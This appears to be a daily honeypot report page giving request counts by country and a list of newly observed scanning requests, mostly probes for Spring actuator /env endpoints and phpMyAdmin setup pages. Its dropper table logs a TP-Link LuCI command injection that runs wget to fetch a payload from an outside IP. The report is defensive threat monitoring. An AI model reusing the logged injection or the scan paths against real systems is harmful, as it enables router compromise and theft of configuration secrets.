Skip to main content
  1. Daily-Posts/

Report: 2025-06-08

·1185 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-08
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 184 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1136 requests were recorded during the day, originating from 2 different countries, with a peak of 271 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
195.3.221.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://45.125.66.79/x/tplink+-O-
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://45.125.66.79/x/tplink+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1412HEAD /_phpMyAdmin/scripts/setup.php HTTP/1.1
1471\x00\x0E\x08\xDC\x9A\x5C\x0Bv\xA4\xB9o\x00\x00\x00\x00\x00
1591\x00\x0E8\xDA\xB9c\xAC\x11\xD2\xD6\xC8\x00\x00\x00\x00\x00
1631GET /client-portal/env HTTP/1.1
1641GET /cf-gateway/actuator/env HTTP/1.1
1651GET /cf-gateway/env HTTP/1.1
1661GET /cas/actuator/env HTTP/1.1
1671GET /cas/env HTTP/1.1
1681GET /basket/actuator/env HTTP/1.1
1691GET /basket/env HTTP/1.1
1701GET /base/actuator/env HTTP/1.1
1711HEAD /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.1
1721HEAD /webadmin/scripts/setup.php HTTP/1.1
1731HEAD /PHPMYADMIN/scripts/setup.php HTTP/1.1
1741HEAD /phpMyAdmin2/scripts/setup.php HTTP/1.1
1751HEAD /MyAdmin/scripts/setup.php HTTP/1.1
1761HEAD /phpMyAdmin3/scripts/setup.php HTTP/1.1
1771HEAD /webdb/scripts/setup.php HTTP/1.1
1791GET /fmapi/env HTTP/1.1
1801GET /flute/actuator/env HTTP/1.1
1811GET /flute/env HTTP/1.1
1821GET /extend/actuator/env HTTP/1.1
1831GET /extend/env HTTP/1.1
1841GET /eubase/actuator/env HTTP/1.1
1851GET /eubase/env HTTP/1.1
1861GET /ees/actuator/env HTTP/1.1
1871GET /ees/env HTTP/1.1
1881GET /design-tools/actuator/env HTTP/1.1
1891GET /design-tools/env HTTP/1.1
1901GET /d2c/actuator/env HTTP/1.1
1911GET /d2c/env HTTP/1.1
1921GET /commercial/actuator/env HTTP/1.1
1931GET /commercial/env HTTP/1.1
1941GET /client-portal/actuator/env HTTP/1.1
1951GET /opac/env HTTP/1.1
1961GET /new-policy/actuator/env HTTP/1.1
1971GET /new-policy/env HTTP/1.1
1981GET /nacos/actuator/env HTTP/1.1
1991GET /nacos/env HTTP/1.1
2001GET /manage/actuator/env HTTP/1.1
2011GET /manage/env HTTP/1.1
2021GET /lts-portal/actuator/env HTTP/1.1
2031GET /lts-portal/env HTTP/1.1
2041GET /kafdrop/actuator/env HTTP/1.1
2051GET /kafdrop/env HTTP/1.1
2061GET /iam/actuator/env HTTP/1.1
2071GET /iam/env HTTP/1.1
2081GET /gateway/actuator/env HTTP/1.1
2091GET /gateway/env HTTP/1.1
2101GET /fmapi/actuator/env HTTP/1.1
2111GET /recommendation/env HTTP/1.1
2121GET /public-api/actuator/env HTTP/1.1
2131GET /public-api/env HTTP/1.1
2141GET /prod-api/actuator/env HTTP/1.1
2151GET /prod-api/env HTTP/1.1
2161GET /spark/actuator/env HTTP/1.1
2171GET /spark/env HTTP/1.1
2181GET /pcsp/actuator/env HTTP/1.1
2191GET /pcsp/env HTTP/1.1
2201GET /hadoop/actuator/env HTTP/1.1
2211GET /hadoop/env HTTP/1.1
2221GET /password/actuator/env HTTP/1.1
2231GET /password/env HTTP/1.1
2241GET /order/actuator/env HTTP/1.1
2251GET /order/env HTTP/1.1
2261GET /opac/actuator/env HTTP/1.1
2271GET /webapi/env HTTP/1.1
2281GET /api-docs/actuator/env HTTP/1.1
2291GET /api-docs/env HTTP/1.1
2301GET /apis/actuator/env HTTP/1.1
2311GET /apis/env HTTP/1.1
2321GET /website/actuator/env HTTP/1.1
2331GET /website/env HTTP/1.1
2341GET /user/actuator/env HTTP/1.1
2351GET /user/env HTTP/1.1
2361GET /tri/actuator/env HTTP/1.1
2371GET /tri/env HTTP/1.1
2381GET /tenancy/actuator/env HTTP/1.1
2391GET /tenancy/env HTTP/1.1
2401GET /surveys/actuator/env HTTP/1.1
2411GET /surveys/env HTTP/1.1
2421GET /recommendation/actuator/env HTTP/1.1
2431GET /dev/env HTTP/1.1
2441GET /api-dev/actuator/env HTTP/1.1
2451GET /api-dev/env HTTP/1.1
2461GET /api-staging/actuator/env HTTP/1.1
2471GET /api-staging/env HTTP/1.1
2481GET /tomcat/actuator/env HTTP/1.1
2491GET /tomcat/env HTTP/1.1
2501GET /eth/actuator/env HTTP/1.1
2511GET /eth/env HTTP/1.1
2521GET /api-reference/actuator/env HTTP/1.1
2531GET /api-reference/env HTTP/1.1
2541GET /api-explorer/actuator/env HTTP/1.1
2551GET /api-explorer/env HTTP/1.1
2561GET /api2/actuator/env HTTP/1.1
2571GET /api2/env HTTP/1.1
2581GET /webapi/actuator/env HTTP/1.1
2591GET /openapi/env HTTP/1.1
2601GET /apidoc/actuator/env HTTP/1.1
2611GET /apidoc/env HTTP/1.1
2621GET /api-details/actuator/env HTTP/1.1
2631GET /api-details/env HTTP/1.1
2641GET /rest-api/actuator/env HTTP/1.1
2651GET /rest-api/env HTTP/1.1
2661GET /jsapi/actuator/env HTTP/1.1
2671GET /jsapi/env HTTP/1.1
2681GET /apidocs/actuator/env HTTP/1.1
2691GET /apidocs/env HTTP/1.1
2701GET /api-doc/actuator/env HTTP/1.1
2711GET /api-doc/env HTTP/1.1
2721GET /api-documentation/actuator/env HTTP/1.1
2731GET /api-documentation/env HTTP/1.1
2741GET /dev/actuator/env HTTP/1.1
2751GET /api-integration/env HTTP/1.1
2761GET /api_v2/actuator/env HTTP/1.1
2771GET /api_v2/env HTTP/1.1
2781GET /api-gateway/actuator/env HTTP/1.1
2791GET /api-gateway/env HTTP/1.1
2801GET /apimanage/actuator/env HTTP/1.1
2811GET /apimanage/env HTTP/1.1
2821GET /document-api/actuator/env HTTP/1.1
2831GET /document-api/env HTTP/1.1
2841GET /apiv2/actuator/env HTTP/1.1
2851GET /apiv2/env HTTP/1.1
2861GET /osapi/actuator/env HTTP/1.1
2871GET /osapi/env HTTP/1.1
2881GET /api-v1/actuator/env HTTP/1.1
2891GET /api-v1/env HTTP/1.1
2901GET /openapi/actuator/env HTTP/1.1
2911GET /ocapi/env HTTP/1.1
2921GET /api_docs/actuator/env HTTP/1.1
2931GET /api_docs/env HTTP/1.1
2941GET /sms-api/actuator/env HTTP/1.1
2951GET /sms-api/env HTTP/1.1
2961GET /api-guide/actuator/env HTTP/1.1
2971GET /api-guide/env HTTP/1.1
2981GET /apigw/actuator/env HTTP/1.1
2991GET /apigw/env HTTP/1.1
3001GET /zapier/actuator/env HTTP/1.1
3011GET /zapier/env HTTP/1.1
3021GET /tm-api/actuator/env HTTP/1.1
3031GET /tm-api/env HTTP/1.1
3041GET /iframe_api/actuator/env HTTP/1.1
3051GET /iframe_api/env HTTP/1.1
3061GET /api-integration/actuator/env HTTP/1.1
3071GET /tapi/env HTTP/1.1
3081GET /api-testing/actuator/env HTTP/1.1
3091GET /api-testing/env HTTP/1.1
3101GET /api-keys/actuator/env HTTP/1.1
3111GET /api-keys/env HTTP/1.1
3121GET /papi/actuator/env HTTP/1.1
3131GET /papi/env HTTP/1.1
3141GET /userapi/actuator/env HTTP/1.1
3151GET /userapi/env HTTP/1.1
3161GET /asyncapi/actuator/env HTTP/1.1
3171GET /asyncapi/env HTTP/1.1
3181GET /api-auth/actuator/env HTTP/1.1
3191GET /api-auth/env HTTP/1.1
3201GET /restapi/actuator/env HTTP/1.1
3211GET /restapi/env HTTP/1.1
3221GET /ocapi/actuator/env HTTP/1.1
3231GET /authserver/actuator/env HTTP/1.1
3241GET /authserver/env HTTP/1.1
3251GET /auth/actuator/env HTTP/1.1
3261GET /auth/env HTTP/1.1
3271GET /app/actuator/env HTTP/1.1
3291GET /api-f/actuator/env HTTP/1.1
3301GET /api-f/env HTTP/1.1
3331GET /account/actuator/env HTTP/1.1
3341GET /account/env HTTP/1.1
3381GET /tapi/actuator/env HTTP/1.1
3541GET /base/env HTTP/1.1
3761\x00\x0E8kv\xB1\xEF\xEC)6\xA1\x00\x00\x00\x00\x00
3821\x00\x0E8\x09L@5&\xC8\x0C\xFF\x00\x00\x00\x00\x00
3961GET /cQ5t HTTP/1.1
3971GET /HXTh HTTP/1.1
4201HEAD /phpma/scripts/setup.php HTTP/1.1
4211HEAD /sqlmanager/scripts/setup.php HTTP/1.1
4221\x00\x0E8a\xB0\x95\xD2j\x82\xA5\xD1\x00\x00\x00\x00\x00
4341\x00\x0E8\xDC\x9A\x5C\x0Bv\xA4\xB9o\x00\x00\x00\x00\x00
4431GET /Odin/http/call1749342075 HTTP/1.1
4451GET /OdinHttpCall1749342075 HTTP/1.1
4461GET /odinhttpcall1749342075 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0271BG
1236NL
2230US
3140GB
481DE
520CN
620NG
716PL
815SC
914IN
1010RU
119JP
128GH
137AO
147CA
154SG
164VN
174BE
184FR
194TR
203KZ
213UA
223HK
232HU
242IL
252IE
262PK
272MX
282PA
292ID
301IR
311ES
321PT
331AR
341SE
351CL
361IT
371BA
381KR

Related

Report: 2025-06-07
·304 words
Repport Daily
Report: 2025-06-06
·408 words
Repport Daily
Report: 2025-06-05
·513 words
Repport Daily